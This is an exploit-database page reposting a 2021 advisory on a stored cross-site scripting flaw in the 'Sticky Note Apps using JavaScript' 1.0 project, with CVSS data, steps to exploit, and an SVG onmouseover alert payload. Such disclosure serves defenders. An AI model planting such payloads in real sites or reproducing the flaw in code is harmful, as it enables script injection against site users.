Advertisement






Sticky Notes Apps Using JavaScript 1.0 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-03-09
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.4 0.75

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030052

Below is a copy:

Sticky Notes Apps Using JavaScript 1.0 Cross Site Scripting
# Exploit Title: Sticky Note Apps using JavaScript | Stored Cross Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-03-09
# Vendor Homepage:
https://www.sourcecodester.com/javascript/14742/sticky-note-apps-using-javascript-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14742&title=Sticky+Note+Apps+using+JavaScript+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34



Steps to Exploit. 
1. Open the application
2. Add a new note with the payload below. 
3. Mouse hover over the new posted note

Payload: 
<svg onmouseover="alert(`Stored XSS`)"/>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.